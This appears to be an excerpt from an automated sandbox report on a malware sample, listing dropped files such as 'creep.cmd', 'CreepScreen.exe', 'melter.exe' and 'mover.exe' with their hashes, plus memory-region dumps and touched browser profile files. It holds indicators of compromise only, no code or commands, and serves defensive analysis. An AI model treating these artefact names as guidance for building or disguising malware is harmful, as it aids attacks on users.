SHA256 5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512 29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\creep.cmd

MD5 e77d2ff29ca99c3902d43b447c4039e2
SHA1 2805268a8db128a7278239d82402c9db0a06e481
SHA256 1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c
SHA512 580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

C:\Users\Admin\AppData\Local\Temp\A914.tmp\CreepScreen.exe

MD5 4ab112b494b6c6762afb1be97cdc19f5
SHA1 eed9d960f86fb10da90d0bbca801aea021658f02
SHA256 ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

C:\Users\Admin\AppData\Local\Temp\A914.tmp\CreepScreen.exe

MD5 4ab112b494b6c6762afb1be97cdc19f5
SHA1 eed9d960f86fb10da90d0bbca801aea021658f02
SHA256 ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

C:\Users\Admin\AppData\Local\Temp\A914.tmp\CreepScreen.exe

MD5 4ab112b494b6c6762afb1be97cdc19f5
SHA1 eed9d960f86fb10da90d0bbca801aea021658f02
SHA256 ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\creep.cmd

MD5 e77d2ff29ca99c3902d43b447c4039e2
SHA1 2805268a8db128a7278239d82402c9db0a06e481
SHA256 1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c
SHA512 580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\CreepScreen.exe

MD5 4ab112b494b6c6762afb1be97cdc19f5
SHA1 eed9d960f86fb10da90d0bbca801aea021658f02
SHA256 ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\CreepScreen.exe

MD5 4ab112b494b6c6762afb1be97cdc19f5
SHA1 eed9d960f86fb10da90d0bbca801aea021658f02
SHA256 ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

memory/2260-861-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A914.tmp\melter.exe

MD5 33b75bd8dbb430e95c70d0265eeb911f
SHA1 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

C:\Users\Admin\AppData\Local\Temp\A914.tmp\melter.exe

MD5 33b75bd8dbb430e95c70d0265eeb911f
SHA1 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\mover.exe

MD5 c1978e4080d1ec7e2edf49d6c9710045
SHA1 b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256 c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA512 2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

C:\Users\Admin\AppData\Local\Temp\A914.tmp\melter.exe

MD5 33b75bd8dbb430e95c70d0265eeb911f
SHA1 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\bg.bmp

MD5 463e7914d89b7dd1bfbba5b89c57eace
SHA1 7f697f8880bcf0beed430d80487dd58b975073fa
SHA256 fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d
SHA512 a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\scarr.mp4

MD5 a504846de42aa7e7b75541fa38987229
SHA1 4c8ba5768db2412d57071071f8573b83ecab0e2d
SHA256 a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89
SHA512 28b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea

memory/5024-876-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\melter.exe

MD5 33b75bd8dbb430e95c70d0265eeb911f
SHA1 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\melter.exe

MD5 33b75bd8dbb430e95c70d0265eeb911f
SHA1 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\creep.cmd

MD5 e77d2ff29ca99c3902d43b447c4039e2
SHA1 2805268a8db128a7278239d82402c9db0a06e481
SHA256 1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c
SHA512 580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\CreepScreen.exe

MD5 4ab112b494b6c6762afb1be97cdc19f5
SHA1 eed9d960f86fb10da90d0bbca801aea021658f02
SHA256 ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\CreepScreen.exe

MD5 4ab112b494b6c6762afb1be97cdc19f5
SHA1 eed9d960f86fb10da90d0bbca801aea021658f02
SHA256 ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA512 4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

memory/5324-897-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\melter.exe

MD5 33b75bd8dbb430e95c70d0265eeb911f
SHA1 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

C:\Users\Admin\AppData\Local\Temp\C67F.tmp\melter.exe

MD5 33b75bd8dbb430e95c70d0265eeb911f
SHA1 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA256 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

C:\Users\Admin\AppData\Local\Temp\A914.tmp\scarr.mp4

MD5 a504846de42aa7e7b75541fa38987229
SHA1 4c8ba5768db2412d57071071f8573b83ecab0e2d
SHA256 a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89
SHA512 28b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea

C:\Users\Admin\AppData\Local\Temp\A914.tmp\bg.bmp

MD5 463e7914d89b7dd1bfbba5b89c57eace
SHA1 7f697f8880bcf0beed430d80487dd58b975073fa
SHA256 fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d
SHA512 a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

C:\Users\Admin\AppData\Local\Temp\A914.tmp\mover.exe

MD5 c1978e4080d1ec7e2edf49d6c9710045
SHA1 b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256 c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA512 2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\scarr.mp4

MD5 a504846de42aa7e7b75541fa38987229
SHA1 4c8ba5768db2412d57071071f8573b83ecab0e2d
SHA256 a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89
SHA512 28b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea

\??\c:\bg.bmp

MD5 463e7914d89b7dd1bfbba5b89c57eace
SHA1 7f697f8880bcf0beed430d80487dd58b975073fa
SHA256 fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d
SHA512 a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\bg.bmp

MD5 463e7914d89b7dd1bfbba5b89c57eace
SHA1 7f697f8880bcf0beed430d80487dd58b975073fa
SHA256 fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d
SHA512 a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\mover.exe

MD5 c1978e4080d1ec7e2edf49d6c9710045
SHA1 b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256 c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA512 2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

memory/956-924-0x00007FF7A0E80000-0x00007FF7A0F78000-memory.dmp

memory/956-925-0x00007FFA8C310000-0x00007FFA8C344000-memory.dmp

memory/956-926-0x00007FFA7F6A0000-0x00007FFA7F954000-memory.dmp

memory/956-927-0x00007FFA8D310000-0x00007FFA8D328000-memory.dmp

memory/956-928-0x00007FFA8D120000-0x00007FFA8D137000-memory.dmp

memory/956-929-0x00007FFA8BED0000-0x00007FFA8BEE1000-memory.dmp

memory/4528-944-0x00007FF7A0E80000-0x00007FF7A0F78000-memory.dmp

memory/4528-946-0x00007FFA7F6A0000-0x00007FFA7F954000-memory.dmp

memory/4528-945-0x00007FFA8C310000-0x00007FFA8C344000-memory.dmp

memory/4528-948-0x00007FFA8D120000-0x00007FFA8D137000-memory.dmp

memory/4528-949-0x00007FFA8BED0000-0x00007FFA8BEE1000-memory.dmp

memory/4528-947-0x00007FFA8D310000-0x00007FFA8D328000-memory.dmp

memory/2716-956-0x00007FF7A0E80000-0x00007FF7A0F78000-memory.dmp

memory/2716-958-0x00007FFA7F6A0000-0x00007FFA7F954000-memory.dmp

memory/2716-957-0x00007FFA8C310000-0x00007FFA8C344000-memory.dmp

memory/2716-960-0x00007FFA8D120000-0x00007FFA8D137000-memory.dmp

memory/2716-961-0x00007FFA8BED0000-0x00007FFA8BEE1000-memory.dmp

memory/2716-962-0x00007FFA884C0000-0x00007FFA884D7000-memory.dmp

memory/2716-964-0x00007FFA88450000-0x00007FFA8846D000-memory.dmp

memory/2716-965-0x00007FFA88430000-0x00007FFA88441000-memory.dmp

memory/2716-966-0x00007FFA7E630000-0x00007FFA7E830000-memory.dmp

memory/2716-963-0x00007FFA88470000-0x00007FFA88481000-memory.dmp

memory/2716-968-0x00007FFA88400000-0x00007FFA88421000-memory.dmp

memory/2716-969-0x00007FFA87ED0000-0x00007FFA87EE8000-memory.dmp

memory/2716-967-0x00007FFA87EF0000-0x00007FFA87F2F000-memory.dmp

memory/2716-959-0x00007FFA8D310000-0x00007FFA8D328000-memory.dmp

memory/2716-972-0x00007FFA87C20000-0x00007FFA87C31000-memory.dmp

memory/2716-973-0x00007FFA87C00000-0x00007FFA87C11000-memory.dmp

memory/2716-974-0x00007FFA87BE0000-0x00007FFA87BFB000-memory.dmp

memory/2716-975-0x00007FFA87BC0000-0x00007FFA87BD1000-memory.dmp

memory/2716-977-0x00007FFA87B50000-0x00007FFA87B80000-memory.dmp

memory/2716-978-0x00007FFA87A00000-0x00007FFA87A67000-memory.dmp

memory/2716-976-0x00007FFA87B80000-0x00007FFA87B98000-memory.dmp

memory/2716-979-0x00007FFA80400000-0x00007FFA8046F000-memory.dmp

memory/2716-980-0x00007FFA87AD0000-0x00007FFA87AE1000-memory.dmp

memory/2716-981-0x00007FFA7F640000-0x00007FFA7F696000-memory.dmp

memory/2716-984-0x00007FFA7DA20000-0x00007FFA7DB90000-memory.dmp

memory/2716-985-0x00007FFA87A90000-0x00007FFA87AA2000-memory.dmp

memory/2716-986-0x00007FFA86E70000-0x00007FFA86EB2000-memory.dmp

memory/2716-989-0x00007FFA7F5E0000-0x00007FFA7F637000-memory.dmp

memory/2716-990-0x00007FFA7D660000-0x00007FFA7D8AB000-memory.dmp

memory/2716-988-0x00007FFA7D8B0000-0x00007FFA7DA1B000-memory.dmp

memory/2716-987-0x00007FFA80250000-0x00007FFA8029C000-memory.dmp

memory/2716-983-0x00007FFA87AB0000-0x00007FFA87AC7000-memory.dmp

memory/2716-982-0x00007FFA7DB90000-0x00007FFA7DD08000-memory.dmp

memory/2716-971-0x00007FFA87C40000-0x00007FFA87C51000-memory.dmp

memory/2716-970-0x00007FFA682F0000-0x00007FFA6939B000-memory.dmp

memory/2716-991-0x00007FFA5B080000-0x00007FFA5C830000-memory.dmp

memory/2716-994-0x00007FFA8D210000-0x00007FFA8D220000-memory.dmp

memory/2716-995-0x00007FFA87870000-0x00007FFA8789F000-memory.dmp

memory/2716-996-0x00007FFA879E0000-0x00007FFA879F1000-memory.dmp

memory/2716-997-0x00007FFA87580000-0x00007FFA87596000-memory.dmp

memory/2716-998-0x00007FFA7EC40000-0x00007FFA7ED05000-memory.dmp

memory/2260-1036-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/5024-1038-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/5324-1116-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f434b4b846dcc34633cfde9af564377d
SHA1 156c43c629e10361334d874211f5eeaa43b48d89
SHA256 99ffabdced11c9cc2d7dd259230f4530267e0b59a762e56d134844700e13bbbf
SHA512 27bc65e062ee803bdb78389a0c94fdfe34440a1960e204cf86ed9286929245f9004330f48b8b4eb7dd6c1ed45abb21f0fc7f39cd70961635cc4d866b89d7f1cc

C:\Users\Admin\Downloads\MS 0735.6+7421.zip

MD5 1b3cf59e94f7d599ed2d54c1f82acb5a
SHA1 10d84b9096c92331106212af9a88cc7f8119c458
SHA256 57c3e5002750b9da9dbf7526a1288bbd84f339fadc16f828ef20d1889c51e483
SHA512 113328d190125c1dd0f7b5dc323a68c41f5a98c1afbec51e414c5f2776097bb1daf44af9aa58acb221c82c11e68b580f414ead1cf8184caf28da259793555a45

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3c3918d5118ea6d0367f78b0d3ad2e42
SHA1 789a74dfe3b7b5388da591ffb748fdcaad44bede
SHA256 c3e096e1577099d2eb4652303d9285811de4701f311485ffd5731522f611f07e
SHA512 27e87f5f002a25a1f19c10ec3ce7c53a4960fbc83217ecb9a389dabc6c3176445a7d2166bd4620f97528a10136083f0696e8380f13b6f13765fd296e20b3bffc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 092538da5a2f6e3f4032b80c90cc81b2
SHA1 b59fe79254bd0964a9a09ac604d28526a07c5f2e
SHA256 5b3b63eb84117d7a61a408a5f76e911fe17fdebf05a5271aa75a520be22d6d7e
SHA512 93e3610d3bac725a27463a833e90d65ca99b064093969bf066ca86053adaf3517d4816d078d2f885a22c5fa727601c99b1014f735bb03dce1c8d037131157c95

C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe

MD5 b13850aceaf6c1ee66c61bc94135fa25
SHA1 f23280f6bec2f097ddf77b97bb19b643a2c5a80b
SHA256 ae2a43a7d58e9766fac59032ba1ecf1df7866ce5bc09b879c6bb111036789ed2
SHA512 d4344edb6e4a460e162169e5621fbf851538c70c6489cca034d1600c3a9a677e8cfa0607e464ea8de3a22066928f540833bc10bf18ae3b1ec7e9147c0d3a897b

memory/2212-1383-0x00007FFA73560000-0x00007FFA74021000-memory.dmp